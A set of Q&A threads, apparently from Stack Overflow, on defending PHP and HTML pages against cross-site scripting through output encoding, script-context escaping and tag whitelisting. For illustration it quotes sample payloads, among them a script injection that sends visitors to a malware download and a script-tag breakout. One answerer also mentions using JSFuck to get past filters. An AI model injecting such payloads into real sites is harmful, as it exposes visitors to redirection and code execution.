Protect XSS issue only by replacing '<' and '>' - html

I would like to know if I can protect my website against XSS attacks by replacing ONLY < and > by < and > or am I missing something.
Example :
<?php echo '<div>' . $escaped . '</div>' ?>
I already know htmlspecialchars PHP function & affiliates

No, for the HTML body you will also need to encode the & character to prevent an attacker from potentially escaping the escape.
Check out the XSS Experimental Minimal Encoding Rules:-
HTML Body (up to HTML 4.01):
HTML Entity encode < &
specify charset in metatag to avoid UTF7 XSS
XHTML Body:
HTML Entity encode < & >
limit input to charset http://www.w3.org/TR/2008/REC-xml-20081126/#charsets
Note that if you want to enter stuff inside of an attribute value, then you need to properly encode all characters with special meaning. The XSS (Cross Site Scripting) Prevention Cheat Sheet mentions to encode the following characters:-
&,<, >, ", ', /
You must also quote the attribute value for the escaping to be effective.

The answer is no, someone will find his way to exploit it, somehow.
You are underestimating the number of techniques and the creativity of attackers. Read through the OWASP XSS Cheat Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet to have an idea of the number of ways this could happen. In your case, does it protect against an XSS into an onload attribute? Or into an input that becomes part of a CSS definition? In those situations you already are into an implicit tag, so you only need JS code to be added, no reason to use '<' or '>'
Do output validation with XSS, it is the simplest thing and it will protect you everywhere, just do it every single time you write anything (no matter if it comes from the user or not) and pay attention to the context (escape/encode for an URL when you are writing a link, escape/encode for JS when you are writing directly into a JS script, escape/encode for CSS when you are writing part of a CSS definition, escape/encode JSON when you write JSON data, escape/encode HTML in any other case).
In addition, even if it is unrelated, I usually point to this site to show how people like to be creative about JS http://www.jsfuck.com/ - this is meant to be obfuscation-only but I used it for evading anti-XSS controls, usually when made by a 3rd party.

Related

Why these 5 (6?) characters are considered "unsafe" HTML characters?

In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &
" (double quote) is converted to "
' (single quote) is converted to ' (only if the flag ENT_QUOTES is set)
< (less than) is converted to <
> (greater than) is converted to >
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this begs the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I sumbit a comment that looks like this.
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone that visits your page is redirected to a virus download. The naive approach here is just to say, okay wellt hen let's filter out some of the important characters in that attack:
< and > will be replaced with < and > and now suddenly our script isn't a script. It's just some html-looking text.
A similar situation arsises with a comment like
Something is <<wrong>> here.
Supposing a user used <<...>> to emphasize for some reason. Their comment would render is
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as & and " and < etc. So it's fairly easy for innocent-looking text to accidentally be an html entity and end up looking very different and very odd for a user.
Consider the comment
I really like #455 ó please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
These chars Are unsafe because in html the <> define a tag. The "", and '' are used to surround attributes. the & is encoded because of the use in html entities. no other chars Should be encoded but they can be ex: the trade symbol can be made into ™ the US dollar sign can be made into &dollar; the euro can be € ANY emoji can be made out of a HTML entity (the name of the encoded things)you can find a explanation/examples here

Sanitize <script> element contents

Say that I want to provide some data to my client (in the first response, with no latency) via a dynamic <script> element.
<script><%= payload %></script>
Say that payload is the string var data = '</script><script>alert("Muahahaha!")';</script>. An end tag (</script>) will allow users to inject arbitrary scripts into my page. How do I properly sanitize the contents of my script element?
I figure I could change </script> to <\/script> and <!-- to <\!--. Are there any other dangerous strings I need to escape? Is there a better way to provide this "cold start" data?
Edited for non-mutation of data.
If I'm interpreting this correctly. You want to prevent the user from ending the script tag prematurely within the user submitted string. That can be done for html just as you stated with adding the backslash in with the ending tag <\/script>. That is the only escaping you should have to worry about in that case. You shouldn't need to escape html comments as the browser will interpret it as part of the javascript. Perhaps if some older browsers don't interpret script tags default to the type of text/javascript correctly (language="javascript" which is deprecated) adding in type='text/javascript' may be necessary.
Based on Mike Samuel's answer here I may have been wrong about not needing to escape html comments. However I was not able to reproduce it in chrome or chromium.
Assuming that you're doing this:
Payload is set to
var data = '[this is user controlled data]';
and the rest of the code (assignment, quotes and semi-colon) is generated by your application, then the encoding you want is hex entity encoding.
See the OWASP XSS Prevention Cheat Sheet, Rule #3 for more information. This will convert
</script><script>alert("Muahahaha!")
into
var data = '\x3c\x2fscript\x3e\x3cscript\x3ealert\x28\x22Muahahaha\x21\x22\x29';
Try this and you will see this has the advantage of storing the user set string exactly correct, no matter what characters it contains. Additionally it takes care of single and double quote encoding. As a super bonus, it is also suitable for storing in HTML attributes:
<a onclick="alert('[user data]');" />
which normally would have to be HTML encoded again for correct display (because & inside an HTML attribute is interpreted as &). However, hex entity encoding does not include any HTML characters with special meaning so you get two for the price of one.
Update from comments
The OP indicated that the server-side code would be generated in the form
var data = <%= JSON.stringify(data) %>;
The above still applies. It is upto the JSON class to properly hex entity encode values as they're inserted into the JSON. This cannot easily be done outside of the class as you'd have to effectively parse the JSON again to determine the current language context. I wouldn't recommend going for the simple option of escaping the forward slash in the </script> because there are other sequences that can end the grammar context such as CDATA closing tags. Escape properly and your code will be future proof and secure.

Why do I need XSS library while I can use Html-encode?

I'm trying to understand why do I need to use XSS library when I can merely do HtlEncode when sending data from server to client ...?
For example , here in Stackoverflow.com - the editor - all the SO tem neads to do is save the user input and display it with html encode.
This way - there will never going to be a HTML tag - which is going to be executed.
I'm probably wrong here -but can you please contradict my statement , or exaplain?
For example :
I know that IMG tag for example , can has onmouseover , onload which a user can do malicious scripts , but the IMG won't event run in the browser as IMG since it's <img> and not <img>
So - where is the problem ?
HTML-encoding is itself one feature an “XSS library” might provide. This can be useful when the platform doesn't have a native HTML encoder (eg scriptlet-based JSP) or the native HTML encoder is inadequate (eg not escaping quotes for use in attributes, or ]]> if you're using XHTML, or #{} if you're worried about cross-origin-stylesheet-inclusion attacks).
There might also be other encoders for other situations, for example injecting into JavaScript strings in a <script> block or URL parameters in an href attribute, which are not provided directly by the platform/templating language.
Another useful feature an XSS library could provide might be HTML sanitisation, for when you want to allow the user to input data in HTML format, but restrict which tags and attributes they use to a safe whitelist.
Another less-useful feature an XSS library could provide might be automated scanning and filtering of input for HTML-special characters. Maybe this is the kind of feature you are objecting to? Certainly trying to handle HTML-injection (an output stage issue) at the input stage is a misguided approach that security tools should not be encouraging.
HTML encoding is only one aspect of making your output safe against XSS.
For example, if you output a string to JavaScript using this code:
<script>
var enteredName = '<%=EnteredNameVariableFromServer %>';
</script>
You will be wanting to hex entity encode the variable for proper insertion in JavaScript, not HTML encode. Suppose the value of EnteredNameVariableFromServer is O'leary, then the rendered code when properly encoded will become:
<script>
var enteredName = 'O\x27leary';
</script>
In this case this prevents the ' character from breaking out of the string and into the JavaScript code context, and also ensures proper treatment of the variable (HTML encoding it would result in the literal value of O'leary being used in JavaScript, affecting processing and display of the value).
Side note:
Also, that's not quite true of Stack Overflow. Certain characters still have special meanings like in the <!-- language: lang-none --> tag. See this post on syntax highlighting if you're interested.

How to make browser ignore html tags

i have created a site where users can make an account by typing in a username and password if i make an account and type <h1> dan</h1> as my username the username will show up on the site as a header. this can lead to loads of abuse if someone was to use perhaps an img src or a load of line breaks. how do i make the browser ignore the html tags so if i was to type <h1> dan</h1>that it would either get rid of the html or just print out the html as regular text.
Various answers for some programming languages have already been given. You might want to read about the underlying techniques (as well as other common threats in web development) on http://www.owasp.org/.
Welcome to the world of security issues in web development
What you are talking about is called input validation. A lot of work has already been done on this subject, and it is never a good idea to start doing this from scratch. The most important thing to remember is that input validation has to be done on the server side, as client side can easily be manipulated.
ESAPI (by OWASP) is an open source library for web security which amongst other things lets you do Input Validation, it has implementations in many languages including PHP and Java. If you're interested in using ESAPI with Java you can take a look at my blog where I use ESAPI for input validation, if you're using another language there are examples for those on the web.
You can use strip_tags() function in PHP.
Maybe you can clean html tags when you are creating the user on you server side code.
Also:
I think that is a must clean the values coming from the client side in the server side.
Either you'll have to get rid off all html tags, or - much simpler - replace all < and > characters with their html-encodings, < and >.
simply output the username using htmlspecialchars().
The translations performed are:
'&' (ampersand) becomes '&'
'"' (double quote) becomes '"' when ENT_NOQUOTES is not set.
"'" (single quote) becomes ''' (or &apos;) only when ENT_QUOTES is set.
'<' (less than) becomes '<'
'>' (greater than) becomes '>'
You can't do this in the browser, you have to do this in your backend.
Identify allowed characters in username,password, whatever value you ask for
When the form is submitted -> validate the input against your previously defined pattern (on the server)
Escape/Encode your data before it is send to the client (browser), i.e. so that <h1> dan</h1> would become <h1glt; dan</h1>
Make yourself confident with some security concerns and how to avoid them like sql injection or crosssite scripting

Limiting HTML Input into Text Box

How do I limit the types of HTML that a user can input into a textbox? I'm running a small forum using some custom software that I'm beta testing, but I need to know how to limit the HTML input. Any suggestions?
i'd suggest a slightly alternative approach:
don't filter incoming user data (beyond prevention of sql injection). user data should be kept as pure as possible.
filter all outgoing data from the database, this is where things like tag stripping, etc.. should happen
keeping user data clean allows you more flexibility in how it's displayed. filtering all outgoing data is a good habit to get into (along the never trust data meme).
You didn't state what the forum was built with, but if it's PHP, check out:
http://htmlpurifier.org/
Library Features: Whitelist, Removal, Well-formed, Nesting, Attributes, XSS safe, Standards safe
Once the text is submitted, you could strip any/all tags that don't match your predefined set using a regex in PHP.
It would look something like the following:
find open tag (<)
if contents != allowed tag, remove tag (from <..>)
Parse the input provides and strip out all html tags that don't match exactly the list you are allowing. This can either be a complex regex, or you can do a stateful iteration through the char[] of the input string building the allowed input string and stripping unwanted attributes on tags like img.
Use a different code system (BBCode, Markdown)
Find some code online that already does this, to use as a basis for your implementation. For example Slashcode must perform this, so look for its implementation in the Perl and use the regexes (that I assume are there)
Regardless what you use, be sure to be informed of what kind of HTML content can be dangerous.
e.g. a < script > tag is pretty obvious, but a < style > tag is just as bad in IE, because it can invoke JScript commands.
In fact, any style="..." attribute can invoke script in IE.
< object > would be one more tag to be weary of.
PHP comes with a simple function strip_tag to strip HTML tags. It allows for certain tags to not be stripped.
Example #1 strip_tags() example
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> Other text';
echo strip_tags($text);
echo "\n";
// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>
The above example will output:
Test paragraph. Other text
<p>Test paragraph.</p> Other text
Personally for a forum, I would use BBCode or Markdown because the amount of support and features provided such as live preview.